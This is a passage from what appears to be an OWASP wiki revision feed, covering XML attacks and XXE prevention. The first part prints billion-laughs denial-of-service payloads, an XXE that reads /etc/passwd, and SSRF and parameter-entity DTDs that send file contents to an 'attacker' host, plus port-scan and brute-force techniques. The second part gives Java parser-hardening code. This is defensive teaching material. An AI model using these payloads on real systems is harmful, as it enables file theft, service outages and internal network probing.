  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as 10 references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; each of these will then be resolved as 10 references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. Finally, the CPU and/or memory will be affected by expanding the resulting 10^9 copies of &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, a total of 3*10^9 (3,000,000,000) characters, which could make the parser crash.&lt;br /&gt;
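&lt;br /&gt;
The size of the expansion follows from multiplying the base text by the fan-out once per nesting level. A minimal Java sketch of that arithmetic, with hypothetical names:&lt;br /&gt;

```java
final class BillionLaughs {
    // Length of the text produced by fully expanding the outermost entity.
    static long expandedLength(long baseLength, int fanOut, int levels) {
        long length = baseLength;
        for (int level = levels; level > 0; level--) {
            // Each level repeats the previous level fanOut times.
            length *= fanOut;
        }
        return length;
    }

    public static void main(String[] args) {
        // Base text of 3 characters, 10 references per entity, 9 nesting levels.
        System.out.println(expandedLength(3, 10, 9));  // 3000000000
    }
}
```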
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE SOAP-ENV:Envelope [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:Envelope entityReference CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt; &lt;br /&gt;
 &amp;lt;SOAP:Envelope entityReference=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; xmlns:SOAP=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:Body&amp;gt; &lt;br /&gt;
   &amp;lt;keyword xmlns=&amp;quot;urn:parasoft:ws:store&amp;quot;&amp;gt;FOO&amp;lt;/keyword&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/SOAP:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY '''xxe''' SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an external entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; whose replacement text is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, and which is expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes it retrieve remote resources, for example a file over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % '''xxe''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt; &lt;br /&gt;
  '''%xxe;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % '''file''' SYSTEM &amp;quot;'''file:///etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % '''dtd''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
  '''%dtd;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;send;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY % '''all''' &amp;quot;&amp;lt;!ENTITY '''send''' SYSTEM ''''http://example.com/?%file;''''&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
 '''%all;'''&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL.&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure you can clearly see what’s going on, because you receive the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
  at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
  at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports, depending on the schema and the underlying implementation. If the timeout occurs while connecting to a closed port (which may take one minute), the response from an open port will be very quick by comparison (one second, for example). The difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes the differences between closed and open ports are very subtle. The only way to know the status of a port with certainty is to take multiple measurements of the time required to reach each host, and then analyze the average time for each port to determine its status. This type of attack is difficult to carry out over higher-latency networks.&lt;br /&gt;
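&lt;br /&gt;
The averaging step can be sketched in a few lines of Java. This is a minimal illustration under stated assumptions: the class, the method names, and the baseline and margin parameters are hypothetical, and whether a slow response means an open or a closed port depends on the implementation being tested.&lt;br /&gt;

```java
public class TimingClassifier {
    // Arithmetic mean of the measured response times, in milliseconds.
    static double meanMillis(long[] samples) {
        if (samples.length == 0) {
            throw new IllegalArgumentException("at least one sample is required");
        }
        long total = 0;
        for (long sample : samples) {
            total += sample;
        }
        return (double) total / samples.length;
    }

    // Hypothetical rule: a port counts as "slow" when its mean response time
    // exceeds the baseline by more than marginMillis.
    static boolean slowerThanBaseline(long[] samples, double baselineMillis, double marginMillis) {
        return meanMillis(samples) - baselineMillis > marginMillis;
    }
}
```

Taking more samples per port reduces the effect of network jitter, which is the reason high-latency networks make this approach unreliable.&lt;br /&gt;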
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI (http, ftp, etc.). For example:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''user''' SYSTEM &amp;quot;http://'''username:password'''@example.com:8080&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;user;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
Fernando Arnaboldi - fernando.arnaboldi [at] ioactive.com&lt;br /&gt;
&lt;br /&gt;
= Other Cheatsheets =&lt;br /&gt;
&lt;br /&gt;
{{Cheatsheet_Navigation_Body}}&lt;br /&gt;
[[Category:Cheatsheets]]&lt;br /&gt;
[[Category:Popular]]&lt;br /&gt;
[[Category:OWASP_Breakers]]&lt;br /&gt;
{{TOC hidden}}&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_External_Entity_(XXE)_Prevention_Cheat_Sheet&amp;diff=224924</id>
		<title>XML External Entity (XXE) Prevention Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_External_Entity_(XXE)_Prevention_Cheat_Sheet&amp;diff=224924"/>
				<updated>2017-01-11T20:26:02Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: DOM4J has also the same type of protections than DOM and SAX&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt; __NOTOC__&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:Cheatsheets-header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}''' &lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
 __TOC__{{TOC hidden}}&lt;br /&gt;
= Introduction =&lt;br /&gt;
&lt;br /&gt;
An &amp;lt;i&amp;gt;XML External Entity&amp;lt;/i&amp;gt; attack is a type of attack against an application that parses XML input. This attack occurs when &amp;lt;b&amp;gt;XML input containing a reference to an external entity is processed by a weakly configured XML parser&amp;lt;/b&amp;gt;. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. The following guide provides concise information to prevent this vulnerability. For more information on XXE, please visit [[XML External Entity (XXE) Processing]].&lt;br /&gt;
&lt;br /&gt;
==General Guidance==&lt;br /&gt;
The safest way to prevent XXE is always to disable DTDs (External Entities) completely. Depending on the parser, the method should be similar to the following:&lt;br /&gt;
 '''&amp;lt;nowiki&amp;gt;factory.setFeature(&amp;quot;http://apache.org/xml/features/disallow-doctype-decl&amp;quot;, true);&amp;lt;/nowiki&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Disabling DTDs also makes the parser secure against denial of service (DoS) attacks such as Billion Laughs. If it is not possible to disable DTDs completely, then external entities and external doctypes must be disabled in the way that’s specific to each parser.&lt;br /&gt;
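&lt;br /&gt;
The effect of disallowing DOCTYPE declarations can be observed with a small check. The following Java sketch uses the feature URI quoted above and assumes the JDK's built-in Xerces-based parser; the class and method names are hypothetical.&lt;br /&gt;

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXException;

public class DoctypeRejection {
    // Returns true when the hardened parser refuses the document. Any SAXException
    // counts as a rejection, which includes the error raised for a disallowed DOCTYPE.
    static boolean isRejected(String xml) {
        try {
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            factory.newDocumentBuilder()
                   .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return false;
        } catch (SAXException e) {
            return true;
        } catch (ParserConfigurationException | IOException e) {
            // The feature is not supported by this parser, or the input could not be read.
            throw new IllegalStateException("parser could not be configured or input not readable", e);
        }
    }
}
```

With this configuration a document that carries any DOCTYPE, including one that only declares internal entities, is refused before entity expansion starts, while a document without a DOCTYPE parses normally.&lt;br /&gt;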
&lt;br /&gt;
Detailed XXE Prevention guidance for a number of languages and commonly used XML parsers in those languages is provided below.&lt;br /&gt;
&lt;br /&gt;
==C/C++==&lt;br /&gt;
&lt;br /&gt;
===libxml2===&lt;br /&gt;
&lt;br /&gt;
The Enum [http://xmlsoft.org/html/libxml-parser.html#xmlParserOption xmlParserOption] should not have the following options defined:&lt;br /&gt;
&lt;br /&gt;
* XML_PARSE_NOENT: Expands entities and substitutes them with replacement text&lt;br /&gt;
* XML_PARSE_DTDLOAD: Load the external DTD&lt;br /&gt;
&lt;br /&gt;
Note: Per: https://mail.gnome.org/archives/xml/2012-October/msg00045.html, starting with libxml2 version 2.9, XXE has been disabled by default as committed by the following patch: http://git.gnome.org/browse/libxml2/commit/?id=4629ee02ac649c27f9c0cf98ba017c6b5526070f.&lt;br /&gt;
&lt;br /&gt;
==Java==&lt;br /&gt;
&lt;br /&gt;
Java applications using XML libraries are particularly vulnerable to XXE because the default setting for most Java XML parsers is to have XXE enabled. To use these parsers safely, you have to explicitly disable XXE in the parser you use. The following describes how to disable XXE in the most commonly used XML parsers for Java.&lt;br /&gt;
&lt;br /&gt;
===JAXP DocumentBuilderFactory, SAXParserFactory and DOM4J===&lt;br /&gt;
&lt;br /&gt;
DocumentBuilderFactory, SAXParserFactory and DOM4J XML Parsers can be configured using the same techniques to protect them against XXE. Only the DocumentBuilderFactory example is presented here. The JAXP DocumentBuilderFactory [http://docs.oracle.com/javase/7/docs/api/javax/xml/parsers/DocumentBuilderFactory.html#setFeature(java.lang.String,%20boolean) setFeature] method allows a developer to control which implementation-specific XML processor features are enabled or disabled. The features can either be set on the factory or the underlying XMLReader [http://docs.oracle.com/javase/7/docs/api/org/xml/sax/XMLReader.html#setFeature%28java.lang.String,%20boolean%29 setFeature] method. Each XML processor implementation has its own features that govern how DTDs and external entities are processed.&lt;br /&gt;
&lt;br /&gt;
For a syntax highlighted code snippet for DocumentBuilderFactory, click [https://gist.github.com/Prandium/dee14ea650ff7900f2c0 here].&lt;br /&gt;
&lt;br /&gt;
For a syntax highlighted code snippet for SAXParserFactory, click [https://gist.github.com/asudhakar02/45e2e6fd8bcdfb4bc3b2 here].&lt;br /&gt;
&lt;br /&gt;
 '''&amp;lt;nowiki&amp;gt;import javax.xml.parsers.DocumentBuilderFactory;&lt;br /&gt;
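import javax.xml.parsers.ParserConfigurationException; // catching unsupported features&lt;br /&gt;
import org.xml.sax.SAXException; // thrown when a DOCTYPE is rejected&lt;br /&gt;
import java.io.IOException; // thrown when an entity cannot be read&lt;br /&gt;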
...&lt;br /&gt;
 &lt;br /&gt;
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();&lt;br /&gt;
    String FEATURE = null;&lt;br /&gt;
    try {&lt;br /&gt;
      // This is the PRIMARY defense. If DTDs (doctypes) are disallowed, almost all XML entity attacks are prevented&lt;br /&gt;
      // Xerces 2 only - http://xerces.apache.org/xerces2-j/features.html#disallow-doctype-decl&lt;br /&gt;
      FEATURE = &amp;quot;http://apache.org/xml/features/disallow-doctype-decl&amp;quot;;&lt;br /&gt;
      dbf.setFeature(FEATURE, true);&lt;br /&gt;
&lt;br /&gt;
      // If you can't completely disable DTDs, then at least do the following:&lt;br /&gt;
      // Xerces 1 - http://xerces.apache.org/xerces-j/features.html#external-general-entities&lt;br /&gt;
      // Xerces 2 - http://xerces.apache.org/xerces2-j/features.html#external-general-entities&lt;br /&gt;
      // JDK7+ - http://xml.org/sax/features/external-general-entities    &lt;br /&gt;
      FEATURE = &amp;quot;http://xml.org/sax/features/external-general-entities&amp;quot;;&lt;br /&gt;
      dbf.setFeature(FEATURE, false);&lt;br /&gt;
&lt;br /&gt;
      // Xerces 1 - http://xerces.apache.org/xerces-j/features.html#external-parameter-entities&lt;br /&gt;
      // Xerces 2 - http://xerces.apache.org/xerces2-j/features.html#external-parameter-entities&lt;br /&gt;
      // JDK7+ - http://xml.org/sax/features/external-parameter-entities    &lt;br /&gt;
      FEATURE = &amp;quot;http://xml.org/sax/features/external-parameter-entities&amp;quot;;&lt;br /&gt;
      dbf.setFeature(FEATURE, false);&lt;br /&gt;
&lt;br /&gt;
      // Disable external DTDs as well&lt;br /&gt;
      FEATURE = &amp;quot;http://apache.org/xml/features/nonvalidating/load-external-dtd&amp;quot;;&lt;br /&gt;
      dbf.setFeature(FEATURE, false);&lt;br /&gt;
&lt;br /&gt;
      // and these as well, per Timothy Morgan's 2014 paper: &amp;quot;XML Schema, DTD, and Entity Attacks&amp;quot; (see reference below)&lt;br /&gt;
      dbf.setXIncludeAware(false);&lt;br /&gt;
      dbf.setExpandEntityReferences(false);&lt;br /&gt;
 &lt;br /&gt;
      // And, per Timothy Morgan: &amp;quot;If for some reason support for inline DOCTYPEs are a requirement, then &lt;br /&gt;
      // ensure the entity settings are disabled (as shown above) and beware that SSRF attacks&lt;br /&gt;
      // (http://cwe.mitre.org/data/definitions/918.html) and denial &lt;br /&gt;
      // of service attacks (such as billion laughs or decompression bombs via &amp;quot;jar:&amp;quot;) are a risk.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
      // remaining parser logic&lt;br /&gt;
      ...&lt;br /&gt;
 &lt;br /&gt;
      } catch (ParserConfigurationException e) {&lt;br /&gt;
            // This should catch a failed setFeature feature&lt;br /&gt;
            logger.info(&amp;quot;ParserConfigurationException was thrown. The feature '&amp;quot; +&lt;br /&gt;
                        FEATURE +&lt;br /&gt;
                        &amp;quot;' is probably not supported by your XML processor.&amp;quot;);&lt;br /&gt;
            ...&lt;br /&gt;
        }&lt;br /&gt;
        catch (SAXException e) {&lt;br /&gt;
            // On Apache, this should be thrown when disallowing DOCTYPE&lt;br /&gt;
            logger.warning(&amp;quot;A DOCTYPE was passed into the XML document&amp;quot;);&lt;br /&gt;
            ...&lt;br /&gt;
        }&lt;br /&gt;
        catch (IOException e) {&lt;br /&gt;
            // XXE that points to a file that doesn't exist&lt;br /&gt;
            logger.error(&amp;quot;IOException occurred, XXE may still be possible: &amp;quot; + e.getMessage());&lt;br /&gt;
            ...&lt;br /&gt;
        }&amp;lt;/nowiki&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
[http://xerces.apache.org/xerces-j/ Xerces 1] [http://xerces.apache.org/xerces-j/features.html Features]:&lt;br /&gt;
* Do not include external entities by setting [http://xerces.apache.org/xerces-j/features.html#external-general-entities this feature] to &amp;lt;code&amp;gt;false&amp;lt;/code&amp;gt;.&lt;br /&gt;
* Do not include parameter entities by setting [http://xerces.apache.org/xerces-j/features.html#external-parameter-entities this feature] to &amp;lt;code&amp;gt;false&amp;lt;/code&amp;gt;.&lt;br /&gt;
* Do not include external DTDs by setting [http://xerces.apache.org/xerces-j/features.html#load-external-dtd this feature] to &amp;lt;code&amp;gt;false&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
[http://xerces.apache.org/xerces2-j/ Xerces 2] [http://xerces.apache.org/xerces2-j/features.html Features]:&lt;br /&gt;
* Disallow an inline DTD by setting [http://xerces.apache.org/xerces2-j/features.html#disallow-doctype-decl this feature] to &amp;lt;code&amp;gt;true&amp;lt;/code&amp;gt;.&lt;br /&gt;
* Do not include external entities by setting [http://xerces.apache.org/xerces2-j/features.html#external-general-entities this feature] to &amp;lt;code&amp;gt;false&amp;lt;/code&amp;gt;.&lt;br /&gt;
* Do not include parameter entities by setting [http://xerces.apache.org/xerces2-j/features.html#external-parameter-entities this feature] to &amp;lt;code&amp;gt;false&amp;lt;/code&amp;gt;.&lt;br /&gt;
* Do not include external DTDs by setting [http://xerces.apache.org/xerces2-j/features.html#nonvalidating.load-external-dtd this feature] to &amp;lt;code&amp;gt;false&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
'''Note: Please use Java 7 update 67, Java 8 update 20 or above; otherwise the above countermeasures for DocumentBuilderFactory and SAXParserFactory do not work. For details, please refer to CVE-2014-6517[http://www.cvedetails.com/cve/CVE-2014-6517/].'''&lt;br /&gt;
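&lt;br /&gt;
Since only the DocumentBuilderFactory variant is shown above, the following Java sketch applies the same feature URIs to a SAXParserFactory. It is a minimal illustration that assumes the JDK's built-in parser; the class and method names are hypothetical.&lt;br /&gt;

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

public class HardenedSaxFactory {
    // Builds a SAXParserFactory with the same features the DocumentBuilderFactory example sets.
    static SAXParserFactory create() {
        SAXParserFactory spf = SAXParserFactory.newInstance();
        try {
            spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
            spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            spf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        } catch (ParserConfigurationException | SAXException e) {
            // A feature is not recognized or not supported by the underlying parser.
            throw new IllegalStateException("XML parser does not support a required feature", e);
        }
        spf.setXIncludeAware(false);
        return spf;
    }

    // Returns true if the document parses, false if the hardened parser rejects it.
    static boolean accepts(String xml) {
        try {
            create().newSAXParser().parse(new InputSource(new StringReader(xml)), new DefaultHandler());
            return true;
        } catch (SAXException e) {
            return false;
        } catch (ParserConfigurationException | IOException e) {
            throw new IllegalStateException("parser could not be created or input not readable", e);
        }
    }
}
```

Failing hard when a feature cannot be set is a deliberate choice in this sketch: a parser that silently ignores a hardening feature would otherwise keep running with its insecure defaults.&lt;br /&gt;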
&lt;br /&gt;
===StAX and XMLInputFactory===&lt;br /&gt;
&lt;br /&gt;
[http://en.wikipedia.org/wiki/StAX StAX] parsers such as [http://docs.oracle.com/javase/7/docs/api/javax/xml/stream/XMLInputFactory.html XMLInputFactory] allow various properties and features to be set.&lt;br /&gt;
&lt;br /&gt;
To protect a Java XMLInputFactory from XXE, do this:&lt;br /&gt;
&lt;br /&gt;
* xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false); // This disables DTDs entirely for that factory&lt;br /&gt;
* xmlInputFactory.setProperty(&amp;quot;javax.xml.stream.isSupportingExternalEntities&amp;quot;, false); // disable external entities&lt;br /&gt;
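&lt;br /&gt;
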